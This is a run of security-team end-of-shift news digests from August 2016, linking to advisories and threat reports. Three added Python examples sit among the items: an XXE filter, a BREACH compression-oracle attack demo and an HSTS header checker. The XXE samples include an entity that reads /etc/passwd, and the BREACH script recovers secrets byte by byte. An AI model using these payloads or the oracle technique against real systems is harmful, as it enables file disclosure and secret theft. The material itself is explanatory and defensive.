=======================
= End-of-Shift report =
=======================
Timeframe: Friday 05-08-2016 18:00 − Monday 08-08-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** F5 Security Advisory: glibc vulnerability CVE-2016-3706 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/06/sol06493172.html?…
*** Smoke Loader - downloader with a smokescreen still alive ***
---------------------------------------------
This time we will have a look at another payload from a recent RIG EK campaign: Smoke Loader (also known as Dofoil), a bot created several years ago. One of its early versions was advertised on the black market in 2011.
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-download…
*** Docker Unspecified Flaw Lets Remote Authenticated Users Deny Service on the Target Swarm Cluster ***
---------------------------------------------
http://www.securitytracker.com/id/1036548
*** Apple iOS Memory Corruption Error in IOMobileFrameBuffer Lets Applications Gain Elevated Privileges on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1036546
*** FortiAnalyzer & FortiManager - Client Side Cross Site Scripting Web Vulnerability ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016080052
*** This PC monitor hack can manipulate pixels for malicious effect ***
---------------------------------------------
Don't believe everything you see. It turns out even your computer monitor can be hacked. On Friday, researchers at DEF CON presented a way to manipulate the tiny pixels found on a computer display. Ang Cui and Jatin Kataria of Red Balloon Security were curious how Dell monitors worked and ended up reverse-engineering one. They picked apart a Dell U2410 monitor and found that the display controller inside can be used to change and log the pixels across the screen. During their DEF CON...
---------------------------------------------
http://www.cio.com/article/3104974/this-pc-monitor-hack-can-manipulate-pixe…
*** Attack on ATMs by remote control ***
---------------------------------------------
A security researcher demonstrated at the Black Hat conference how cash can be withdrawn from other people's accounts despite PIN protection. The PIN can allegedly also be captured on modern ATMs without leaving any traces.
---------------------------------------------
http://heise.de/-3289469
*** External hard drives with encryption can be cracked ***
---------------------------------------------
Many USB hard drives with full-disk encryption and a PIN keypad can presumably be decrypted by replacing the firmware of the USB-to-SATA bridge chip.
---------------------------------------------
http://heise.de/-3289530
*** Video surveillance recorders RIDDLED with 0-days ***
---------------------------------------------
Kit from NUUO, Netgear has face-palm grade stoopid. There are multiple web interface vulnerabilities in a network video recorder sold under Netgear's ReadyNAS brand and in various devices by video recording company NUUO.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/08/07/nuuo_netgea…
*** Strider: Cyberespionage group turns eye of Sauron on targets ***
---------------------------------------------
Low-profile group uses Remsec malware to spy on targets in Russia, China, and Europe. A previously unknown group called Strider has been conducting cyberespionage-style attacks against selected targets in Russia, China, Sweden, and Belgium. The group uses an advanced piece of malware known as Remsec (Backdoor.Remsec) to conduct its attacks.
---------------------------------------------
http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-ey…
*** Week in review: Black Hat USA 2016 coverage, QRLJacking, exposed SAP systems ***
---------------------------------------------
Here's an overview of some of last week's most interesting news and articles: Black Hat USA 2016: Want to learn the news from Black Hat USA 2016? Get it all from our dedicated coverage page. QRLJacking: A new attack vector for hijacking online accounts: We all know that scanning random QR codes is a risky proposition, but a newly detailed social engineering attack vector dubbed QRLJacking adds another risk layer to their use. 36000 SAP...
---------------------------------------------
https://www.helpnetsecurity.com/2016/08/08/week-review-black-hat-usa-2016-c…
*** Bugtraq: vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539149
*** VMware product updates address multiple important security issues ***
---------------------------------------------
VMware product updates address a DLL hijacking issue in Windows-based VMware Tools and an HTTP Header injection issue in vCenter Server and ESXi.
Relevant products: VMware vCenter Server, VMware vSphere Hypervisor (ESXi), VMware Workstation Pro, VMware Workstation Player, VMware Fusion, VMware Tools
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2016-0010.html
*** Remote Butler attack: APT groups' dream come true ***
---------------------------------------------
Microsoft security researchers have come up with an extension of the "Evil Maid" attack that allows attackers to bypass local Windows authentication to defeat full disk encryption: "Remote Butler". Demonstrated at Black Hat USA 2016 by researchers Tal Be'ery and Chaim Hoch, the Remote Butler attack has one crucial improvement over Evil Maid: it can be effected by attackers who do not have physical access to the target Windows computer that has, at one time,...
---------------------------------------------
https://www.helpnetsecurity.com/2016/08/08/remote-butler-attack/
*** IBM Security Bulletin: Multiple vulnerabilities may affect IBM WebSphere Real Time ***
---------------------------------------------
Java SE issues disclosed in the Oracle July 2016 Critical Patch Update. CVE(s): CVE-2016-3598, CVE-2016-3511, CVE-2016-3485. Affected product(s) and affected version(s): These vulnerabilities affect IBM WebSphere Real Time Version 3 Service Refresh 9 Fix Pack 40 and earlier releases. Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=swg21987762 X-Force Database: ...
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg21987762
*** IBM Security Bulletin: Multiple vulnerabilities may affect IBM SDK, Java Technology Edition ***
---------------------------------------------
Java SE issues disclosed in the Oracle July 2016 Critical Patch Update. CVE(s): CVE-2016-3610, CVE-2016-3598, CVE-2016-3606, CVE-2016-3587, CVE-2016-3511, CVE-2016-3550, CVE-2016-3485. Affected product(s) and affected version(s): These vulnerabilities affect IBM SDK, Java Technology Edition, Version 6 Service Refresh 16 Fix Pack 26 and earlier releases. These vulnerabilities affect IBM SDK, Java Technology Edition, Version 6R1 Service...
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg21986642
*** IBM Security Bulletin: OpenStack vulnerabilities affect IBM SmartCloud Entry (CVE-2015-7548, CVE-2015-8749, CVE-2015-1850) ***
---------------------------------------------
IBM SmartCloud Entry is vulnerable to several OpenStack Nova vulnerabilities, which could allow a local authenticated attacker or a remote attacker to obtain sensitive information. CVE(s): CVE-2015-8749, CVE-2015-7548, CVE-2015-1850. Affected product(s) and affected version(s): IBM SmartCloud Entry 3.2 through Appliance fix pack 21; IBM SmartCloud Entry 3.1 through Appliance fix pack 21. Refer to the...
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=isg3T1023865
*** VU#735416: UltraVNC repeater does not restrict IP addresses or ports by default ***
---------------------------------------------
Vulnerability Note VU#735416: UltraVNC repeater does not restrict IP addresses or ports by default. Original release date: 08 Aug 2016 | Last revised: 08 Aug 2016. Overview: UltraVNC repeater versions prior to ultravnc_repeater_1300 do not restrict usage by IP address by default and cannot restrict by port, which may be leveraged to induce connections to arbitrary hosts using any port. Description: CWE-16: Configuration - CVE-2016-5673. UltraVNC repeater acts as a proxy to route remote desktop VNC...
---------------------------------------------
http://www.kb.cert.org/vuls/id/735416
*** Newly appearing encryption Trojan (ransomware) renders data irrecoverably unusable ***
---------------------------------------------
[...] The currently circulating variants of the ransomware call themselves Vegclass(a)aol.com, Salazar-Slytherin10(a)yahoo.com, etc.; the actual malicious code, however, is most likely traceable to the ransomware "Troldesh", which originates from Russia.
---------------------------------------------
http://www.bmi.gv.at/cms/bmi/_news/bmi.aspx?id=524B7A526E703148456D553D&pag…
*** Smuggling malware into isolated networks with barcodes and Excel ***
---------------------------------------------
A hacker gets malware into networks in which neither USB, optical drives nor network transfers work, by taking a detour: he converts the software into 2D barcodes, which he then turns back into executable code with Excel.
---------------------------------------------
http://heise.de/-3290119
*** Qualcomm-powered Android devices plagued by four rooting flaws ***
---------------------------------------------
Hundreds of millions of Android devices based on Qualcomm chipsets are likely exposed to at least one of four critical vulnerabilities that allow non-privileged apps to take them over. The four flaws were presented by security researcher Adam Donenfeld from Check Point Software Technologies on Sunday at the DEF CON security conference in Las Vegas. They were reported to Qualcomm between February and April, and the chipset maker has since released fixes for the vulnerabilities after classifying...
---------------------------------------------
http://www.cio.com/article/3104896/qualcomm-powered-android-devices-plagued…
*** Data Breach At Oracle's MICROS Point-of-Sale Division ***
---------------------------------------------
A Russian organized cybercrime group known for hacking into banks and retailers appears to have breached more than 700 computer systems at software giant Oracle Corp., KrebsOnSecurity has learned. More alarmingly, the attackers appear to have compromised a customer support portal for companies using Oracle's MICROS point-of-sale credit card payment systems.
---------------------------------------------
http://krebsonsecurity.com/?p=35752
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 04-08-2016 18:00 − Friday 05-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** iPhone: watch out for targeted phishing after theft ***
---------------------------------------------
Thieves rely on fake Apple letters to get theft victims to enter their credentials. With those they can lift the activation lock and sell the stolen iPhone in fully working condition.
---------------------------------------------
http://heise.de/-3288554
*** Microsoft Bounty Programs Expansion – Microsoft Edge Remote Code Execution (RCE) Bounty ***
---------------------------------------------
I’m very happy to announce another addition to the Microsoft Bounty Programs. Microsoft will be hosting a ..
---------------------------------------------
https://blogs.technet.microsoft.com/msrc/2016/08/04/microsoft-bounty-progra…
*** Pwnie Awards 2016: the Oscars of the security scene go to … ***
---------------------------------------------
The cute golden Pwnies went, among others, to Tavis Ormandy, Charlie Miller, Juniper and Western Digital. Not ..
---------------------------------------------
http://heise.de/-3288420
*** To Obfuscate, or not to Obfuscate ***
---------------------------------------------
Introduction: Malware's goal is to bypass computer defenses, infect a target, and often remain on the system as long as possible. A variety of techniques are used to accomplish ..
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/To-Obfuscate,-or-not-to…
*** Apple will pay hackers 200,000 dollars for bug discoveries ***
---------------------------------------------
While Microsoft, Google and co. have been running bug bounty programs for some time, Apple had so far held back
---------------------------------------------
http://derstandard.at/2000042391260
*** Cyber Grand Challenge: IT security could change radically ***
---------------------------------------------
When computers search for, find and then either patch or exploit security vulnerabilities fully autonomously, what remains ..
---------------------------------------------
http://heise.de/-3288820
*** WPAD: 20-year-old protocol puts millions of users at risk ***
---------------------------------------------
The WPAD protocol is used to configure proxies automatically and represents a long-known ..
---------------------------------------------
http://heise.de/-3288801
*** Odd Packet: Any ideas where this comes from?, (Fri, Aug 5th) ***
---------------------------------------------
Our reader submitted to us several odd packets. Of course, I can't resist figuring out what exactly is going on here: the packets appear to include a lengthy preamble, but I ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21343
*** Frequent Password Changes is a Bad Security Idea ***
---------------------------------------------
I've been saying for years that it's bad security advice, that it encourages poor passwords. Lorrie Cranor, now the FTC's chief technologist, agrees: By studying the data, the researchers identified common techniques ..
---------------------------------------------
https://www.schneier.com/blog/archives/2016/08/frequent_passwo.html
*** After the Bitcoin hack: Bitfinex thieves now want to donate ***
---------------------------------------------
After attackers stole bitcoin worth around 72 million US dollars from Bitfinex, they apparently want to donate part of it. A total of 1,000 bitcoin ..
---------------------------------------------
http://www.golem.de/news/nach-bitcoin-hack-bitfinex-diebe-wollen-jetzt-spen…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 03-08-2016 18:00 − Thursday 04-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco TelePresence Video Communication Server Expressway Command Injection Vulnerability ***
---------------------------------------------
A vulnerability in the administrative web interface of Cisco TelePresence Video Communication Server Expressway could allow an authenticated, remote attacker to execute arbitrary commands on the affected system. The ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco RV180 VPN and RV180W Wireless-N Multifunction VPN Routers Remote Code Execution Vulnerability ***
---------------------------------------------
A vulnerability in the web interface of the Cisco RV180 VPN Router and Cisco RV180W Wireless-N Multifunction VPN Router could allow an authenticated, remote ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco RV110W, RV130W, and RV215W Routers Command Shell Injection Vulnerability ***
---------------------------------------------
A vulnerability in the command-line interface (CLI) command parser of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Administration Views - Critical - Access bypass - SA-CONTRIB-2016-041 ***
---------------------------------------------
https://www.drupal.org/node/2778501
*** Snitches get stitches: Little Snitch bugs were a blessing for malware ***
---------------------------------------------
Now-patched kernel-level flaw in OS X app firewall will be revealed this week. DEF CON: Vulnerabilities in popular OS X security tool Little Snitch potentially granted malicious applications extra powers, undermining the protection offered by the software.
---------------------------------------------
www.theregister.co.uk/2016/08/03/mac_firewall_littlesnitch/
*** A look into Neutrino EK’s jQueryGate ***
---------------------------------------------
In the cybercrime landscape, Exploit Kits (EKs) are the tools of choice to infect endpoints by exploiting software vulnerabilities. However, a critical component EKs ..
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/exploits-threat-analysis/2016…
*** [20160802] - Core - XSS Vulnerability ***
---------------------------------------------
https://developer.joomla.org/security-centre/653-20160802-core-xss-vulnerab…
*** [20160801] - Core - ACL Violation ***
---------------------------------------------
https://developer.joomla.org/security-centre/652-20160801-core-core-acl-vio…
*** [20160803] - Core - CSRF ***
---------------------------------------------
https://developer.joomla.org/security-centre/654-20160803-core-csrf.html
*** XML External Entity Injection Opens Door to Attacks, Theft ***
---------------------------------------------
XML is a popular language for web developers, partly due to its software and hardware independence. Recently, however, XML security has come under threat from XML external ..
---------------------------------------------
https://blogs.mcafee.com/mcafee-labs/xml-external-entity-injection-opens-do…
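As an added example (not code from the McAfee article), the Python below shows one hardening for XML external entity injection that works regardless of how the parser behind it is configured: untrusted XML containing any DOCTYPE or ENTITY declaration is rejected before it is parsed, so the classic external-entity payload and the entity-expansion denial of service never reach the parser. The sample documents are constructed; the file:// reference in the payload is never resolved.

```python
import re
import xml.etree.ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DTD and is rejected before parsing."""


# Any DOCTYPE (which is where ENTITY declarations live) is refused outright.
# Matched case-insensitively on the decoded text.
_DTD_MARKER = re.compile(r"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source with DTDs prohibited.

    Refusing the DTD as a whole (not only external entities) closes XXE, the
    parameter-entity variants used for out-of-band exfiltration and entity
    expansion DoS ('billion laughs'), independent of the parser's own settings.
    Input the check cannot inspect (UTF-16/32) is rejected instead of waved through."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff") or b"\x00" in data[:4]:
        raise UnsafeXML("UTF-16/UTF-32 input not accepted: transcode to UTF-8 first")
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise UnsafeXML(f"not valid UTF-8: {exc}") from None
    if _DTD_MARKER.search(text):
        raise UnsafeXML("DOCTYPE/ENTITY declaration in untrusted XML rejected")
    return ET.fromstring(data)


def customer_of(order_xml: bytes) -> str:
    """Example consumer: returns the <customer> text of an <order> document."""
    root = parse_untrusted_xml(order_xml)
    node = root.find("customer")
    return node.text if node is not None else ""


def is_rejected(data: bytes) -> bool:
    """True if the hardening step refuses the document."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML:
        return True
    return False


# Constructed inputs for the demonstration (hypothetical order documents).
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><customer>&xxe;</customer></order>"""

BILLION_LAUGHS = b"""<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
]><lolz>&lol2;</lolz>"""

CLEAN_ORDER = b"""<?xml version="1.0"?>
<order><customer>alice</customer><item sku="42"/></order>"""


if __name__ == "__main__":
    print("clean order customer:", customer_of(CLEAN_ORDER))
    print("XXE payload rejected:", is_rejected(XXE_PAYLOAD))
    print("billion laughs rejected:", is_rejected(BILLION_LAUGHS))
```

The check is deliberately strict: a legitimate document with an internal DTD, or one that merely mentions <!DOCTYPE inside a comment, is rejected as well. Where DTDs must be accepted, the parser itself has to be configured (for example lxml's resolve_entities=False, or a wrapper such as defusedxml) rather than relying on a pre-parse filter.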
*** A Plugin’s Expired Domain Poses a Security Threat to Websites ***
---------------------------------------------
Do you keep all your website software (including all third-party themes, plugins and components) up-to-date? You should! We always recommend this to our ..
---------------------------------------------
https://blog.sucuri.net/2016/08/plugin-expired-domain-security-threat.html
*** DSA-3639 wordpress - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3639
*** Activity Log <= 2.3.2 - Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8584
*** HEIST: timing and compression attack on TLS ***
---------------------------------------------
By cleverly combining a timing attack in JavaScript with the already known BREACH attack, it is possible to decrypt secrets in TLS connections. Unlike before, no man-in-the-middle position is required.
---------------------------------------------
http://www.golem.de/news/heist-timing-und-kompressionsangriff-auf-tls-1608-…
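The compression side channel that HEIST builds on (BREACH) is easy to reproduce offline. The following Python script is an added example, not part of the report or of the HEIST/BREACH research; the page body, the token value and the hex alphabet are constructed. It reflects attacker-chosen input next to a secret, compresses the body with DEFLATE and recovers the secret byte by byte purely from the compressed sizes, which is all an attacker gets to see, whether as TLS record lengths on the wire or, with HEIST, as response sizes inferred from JavaScript timing.

```python
import zlib

# Constructed data for the demonstration: the secret token and the page are made up.
SECRET = "csrf=7f3a9"
HEX = "0123456789abcdef"


def page(reflected: str, secret: str = SECRET) -> bytes:
    """Constructed HTTP response body: attacker input echoed next to a secret."""
    return (
        "<html><body>"
        f"<p>You searched for: {reflected}</p>"
        f"<form><input type='hidden' name='token' value='{secret}'></form>"
        "</body></html>"
    ).encode()


def compressed_len(body: bytes) -> int:
    """Size of the body after DEFLATE, i.e. what an eavesdropper sees as the
    record length when HTTP compression is on. Fixed Huffman codes are forced
    (an assumption made for determinism): then one extra LZ77-matched byte is
    exactly one output byte less. Real servers use dynamic Huffman tables, which
    is why BREACH/HEIST need padding or the 'two tries' trick to read the signal."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15, 9, zlib.Z_FIXED)
    return len(co.compress(body) + co.flush())


def recover_secret(known_prefix: str, length: int, size_oracle) -> str:
    """Byte-at-a-time recovery. For every candidate byte the victim is made to
    request a page whose reflected part is known_prefix + guess; the guess that
    extends the LZ77 match against the real secret compresses one byte smaller."""
    known = known_prefix
    for _ in range(length):
        sizes = {c: size_oracle(known + c) for c in HEX}
        best = min(sizes.values())
        candidates = [c for c, s in sizes.items() if s == best]
        if len(candidates) != 1:
            raise RuntimeError(f"ambiguous step after {known!r}: {candidates}")
        known += candidates[0]
    return known[len(known_prefix):]


def breach_demo() -> str:
    """Run the attack against the constructed page; returns the recovered token."""
    # The attacker never sees the body, only its compressed size per request.
    oracle = lambda guess: compressed_len(page(guess))
    return recover_secret("csrf=", len(SECRET) - len("csrf="), oracle)


if __name__ == "__main__":
    print("recovered:", breach_demo())
```

Fixed Huffman coding is forced so that each correct byte shows up as exactly one byte less output; against a real server with dynamic Huffman tables the signal is noisier and the attack relies on padding and repeated measurements. The defences are the known ones: do not compress responses that mix attacker-controlled input with secrets, or mask per-request tokens so the same secret never appears twice in compressible form.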
*** Activity Log <= 2.3.2 - Cross-Site Scripting (XSS) in page ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8585
*** Phishing study: curiosity beats security concerns ***
---------------------------------------------
Despite all warnings and security precautions, users are very easily lured to a website if the phishing email sounds tempting enough. Researchers argue this should have consequences for security architecture.
---------------------------------------------
http://www.golem.de/news/phishing-studie-neugier-siegt-ueber-sicherheitsbed…
*** Social engineering: every second person falls for USB sticks and Facebook messages ***
---------------------------------------------
Would you plug in a USB stick you had just found? Would you click the link in a Facebook message from someone you do not know? According to two studies, many people answer no, but do it anyway.
---------------------------------------------
http://heise.de/-3287818
*** DSA-3640 firefox-esr - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3640
*** DSA-3638 curl - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3638
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 02-08-2016 18:00 − Wednesday 03-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** MICROSOFT LIVE ACCOUNT CREDENTIALS LEAKING FROM WINDOWS 8 AND ABOVE ***
---------------------------------------------
Discovered in 1997 by Aaron Spangler and never fixed, the WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4) is certainly an excellent vintage. In Windows 8 and 10, the same bug has now been found to potentially leak the user's Microsoft Live account login and (hashed) password information, which is also used to access OneDrive, Outlook, Office, Mobile, Bing, Xbox Live, MSN and Skype (if used with a Microsoft account).
---------------------------------------------
https://hackaday.com/2016/08/02/microsoft-live-account-credentials-leaking-…
*** Internet telephony: data protection authorities recommend Perfect Forward Secrecy ***
---------------------------------------------
The International Working Group on Data Protection in Telecommunications recommends the use of secure encryption in apps for VoIP or chat. Providers should store as little personal data as possible.
---------------------------------------------
http://heise.de/-3285356
*** SAP ASE file creation vulnerability (CVE-2016-6196) ***
---------------------------------------------
Recently SAP released a patch for an Adaptive Server Enterprise vulnerability that allows legitimate database users to create files on disk anywhere the server process can write. This is useful when doing a chained database attack - first create...
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/SAP-ASE-file-creation-v…
*** The Dark Side of Certificate Transparency, (Wed, Aug 3rd) ***
---------------------------------------------
I am a big fan of the idea behind Certificate Transparency [1]. The real problem with SSL (and TLS... it really doesn't matter for this discussion) is not the weak ciphers or subtle issues with algorithms (yes, you should still fix it), but the certificate authority trust model. It has been too easy in the past to obtain a fraudulent certificate [2]. There was little accountability when it came to certificate authorities issuing test certificates, or just messing up, and validating the wrong...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21329&rss
*** Windows 10 Anniversary Update enforces signed drivers more strictly ***
---------------------------------------------
Since the 64-bit version of Windows Vista, Microsoft has required digitally signed drivers for PC components; the latest Windows 10 version 1607 (Redstone) raises the requirements further.
---------------------------------------------
http://heise.de/-3285419
*** Insecure SMS authentication: Telegram accounts in Iran apparently hacked ***
---------------------------------------------
Many consider the messaging service Telegram a secure alternative to WhatsApp. But it is quite possible to bypass its security precautions and take over accounts.
---------------------------------------------
http://www.golem.de/news/unsichere-sms-authentifizierung-telegram-accounts-…
*** FossHub compromised: software installers infected with malware ***
---------------------------------------------
The download platform FossHub has been hacked. The attackers infected the installers of popular open-source programs with malware that overwrites the bootloader.
---------------------------------------------
http://heise.de/-3286347
*** A brief introduction to Forensic Readiness ***
---------------------------------------------
Introduction: As defined in RFC 2350 (Expectations for Computer Security Incident Response), a security incident is any adverse event which compromises some aspect of computer or network security. The definition of an incident may vary between organizations but is generally related to the compromise of confidentiality (e.g. document theft), integrity (e.g. alteration of the...
---------------------------------------------
http://resources.infosecinstitute.com/a-brief-introduction-to-forensic-read…
*** Finding and Enumerating Processes within Memory-Part 1 ***
---------------------------------------------
In this article series, we will learn about how processes reside in memory and various ways to find and enumerate them. I will be using Volatility plugins to find processes in memory. Once we know how to find processes within memory, in Part 2 we will see how to enumerate through them. Note: The scope...
---------------------------------------------
http://resources.infosecinstitute.com/finding-and-enumerating-processes-wit…
*** Social engineering: how to coax passwords out of people with chocolate ***
---------------------------------------------
Scientists demonstrate an alarmingly careless handling of confidential data
---------------------------------------------
http://derstandard.at/2000042272093-406
*** Four high-profile vulnerabilities in HTTP/2 revealed ***
---------------------------------------------
Imperva released a new report at Black Hat USA 2016, which documents four high-profile vulnerabilities researchers at the Imperva Defense Center found in HTTP/2, the new version of the HTTP protocol that serves as one of the main building blocks of the World Wide Web. HTTP/2 introduces new mechanisms that effectively increase the attack surface of business critical web infrastructure which then becomes vulnerable to new types of attacks. Imperva researchers took an in-depth look at...
---------------------------------------------
https://www.helpnetsecurity.com/2016/08/03/vulnerable-http2/
*** Stealing payment card data and PINs from POS systems is dead easy ***
---------------------------------------------
Many of the large payment card breaches that hit retail and hospitality businesses in recent years were the result of attackers infecting point-of-sale systems with memory-scraping malware. But there are easier ways to steal this sort of data, due to a lack of authentication and encryption between card readers and the POS payment applications. POS systems are specialized computers. They typically run Windows and have peripherals like keyboards, touch screens, barcode scanners and card readers...
---------------------------------------------
http://www.cio.com/article/3102922/stealing-payment-card-data-and-pins-from…
*** Nagios Core Access Control Flaw Lets Remote Users Conduct Cross-Site Request Forgery Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1036513
*** Moxa SoftCMS SQL Injection Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a SQL injection vulnerability in Moxa's SoftCMS.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-215-01
*** Siemens SINEMA Server Privilege Escalation Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a privilege escalation vulnerability in the Siemens SINEMA Server.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-215-02
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 01-08-2016 18:00 − Tuesday 02-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Android Security Bulletin August 2016 ***
---------------------------------------------
https://source.android.com/security/bulletin/2016-08-01.html
*** Google Domain Enables HSTS Protection ***
---------------------------------------------
Google ensures HTTPS connections to its domains with support for HTTP Strict Transport Security, or HSTS.
---------------------------------------------
http://threatpost.com/google-domain-enables-hsts-protection/119597/
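An HSTS header only protects when its directives are right, and the preload list that Google's domains are on has fixed requirements: a max-age of at least one year, includeSubDomains and preload. The Python below is an added example (not code from the Threatpost article or from Google) that parses a Strict-Transport-Security value along the lines of RFC 6797 and lists what a reviewer would flag; the header values it is run against are constructed.

```python
ONE_YEAR = 31536000  # seconds; the minimum max-age the HSTS preload list requires


class HstsError(ValueError):
    """Raised for a header value that RFC 6797 says browsers must ignore."""


def parse_hsts(value: str) -> dict:
    """Parse a Strict-Transport-Security header value into its directives.

    Directive names are case-insensitive and ';'-separated; unknown directives
    are ignored. A missing or malformed max-age makes the whole header invalid,
    which for the browser is the same as receiving no HSTS header at all."""
    parsed = {"max_age": None, "include_subdomains": False, "preload": False}
    seen = set()
    for directive in value.split(";"):
        directive = directive.strip()
        if not directive:
            continue
        name, _, arg = directive.partition("=")
        name = name.strip().lower()
        arg = arg.strip().strip('"')
        if name in seen:  # RFC 6797 6.1: a directive must not appear more than once
            raise HstsError(f"duplicate directive {name!r}")
        seen.add(name)
        if name == "max-age":
            if not arg.isdigit():
                raise HstsError(f"max-age must be a non-negative integer, got {arg!r}")
            parsed["max_age"] = int(arg)
        elif name == "includesubdomains":
            parsed["include_subdomains"] = True
        elif name == "preload":
            parsed["preload"] = True
    if parsed["max_age"] is None:
        raise HstsError("max-age is required")
    return parsed


def hsts_findings(value: str) -> list:
    """Problems a reviewer would flag about a site's HSTS header; [] means preload-ready."""
    try:
        p = parse_hsts(value)
    except HstsError as exc:
        return [f"invalid header ({exc}): browsers ignore it, so there is no HSTS protection"]
    findings = []
    if p["max_age"] == 0:
        findings.append("max-age=0 tells browsers to forget the policy")
    elif p["max_age"] < ONE_YEAR:
        findings.append(f"max-age={p['max_age']} is below the one year the preload list requires")
    if not p["include_subdomains"]:
        findings.append("includeSubDomains missing: plain-HTTP subdomains can still set or leak parent-domain cookies")
    if not p["preload"]:
        findings.append("preload missing: the first visit, before the policy is cached, is unprotected")
    return findings


if __name__ == "__main__":
    # Constructed header values, not captured from any real site.
    for header in ("max-age=31536000; includeSubDomains; preload", "max-age=604800", "includeSubDomains"):
        print(repr(header), "->", hsts_findings(header) or "ok")
```

Two things the parser reminds you of: the header is only honoured when received over a TLS connection, so it has to be emitted on the HTTPS side (and ideally also on every redirect from HTTP), and until the domain is in the browser's preload list the very first plaintext request is still exposed.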
*** DSA-3637 chromium-browser - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3637
*** Slinging Hash: Speeding Cyber Threat Hunting Methodologies via Hash-Based Searching ***
---------------------------------------------
Introduction The term "hash" is thrown around in casual IT conversation quite a bit nowadays, ..
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/Slinging-Hash--Speeding…
*** 36000 SAP systems exposed online, most open to attacks ***
---------------------------------------------
ERPScan released the first comprehensive SAP Cybersecurity Threat Report, which covers three main angles: Product Security, Implementation Security, and Security Awareness. The company used its own scanning method to gather ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/08/02/sap-cybersecurity-report/
*** 200 million Yahoo accounts are being sold on the darknet ***
---------------------------------------------
Login information for around 200 million Yahoo accounts is being offered for sale. And Yahoo knows about it.
---------------------------------------------
http://futurezone.at/digital-life/im-darknet-werden-200-millionen-yahoo-acc…
*** FireEye admits filtering out legitimate emails in sniffer snafu ***
---------------------------------------------
Benign messages frogmarched into quarantine. FireEye has admitted that a snafu involving its email filtering technology meant harmless messages were shuffled off to quarantine for no good reason.
---------------------------------------------
www.theregister.co.uk/2016/08/02/fireeye_filtering_snafu/
*** Kaspersky's heart for hackers: 50,000 US dollars for reported bugs ***
---------------------------------------------
As the second AV vendor to do so, the Russian company is introducing a bug bounty program. Security researchers are now to be paid for finding vulnerabilities in Kaspersky products.
---------------------------------------------
http://heise.de/-3284172
*** Introducing the p0f BPF compiler ***
---------------------------------------------
Two years ago we blogged about our love of BPF (BSD packet filter) bytecode. Then we published a set of utilities we are using to generate the BPF ..
---------------------------------------------
https://blog.cloudflare.com/introducing-the-p0f-bpf-compiler/
*** Timing Attacks in the Modern Web ***
---------------------------------------------
Before you explore all the details of these browser-based timing attacks, head over to my laboratories to play around with these attacks yourself!
---------------------------------------------
https://tom.vg/2016/08/browser-based-timing-attacks/
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 29-07-2016 18:00 − Monday 01-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Fake FreeDNS Used to Redirect Traffic to Malicious Sites ***
---------------------------------------------
During the last couple of days we performed a few similar cleanup requests where sites occasionally redirected visitors to malicious sites that displayed ads, spam and malicious downloads. One of our security analysts, Andrey Kucherov, ..
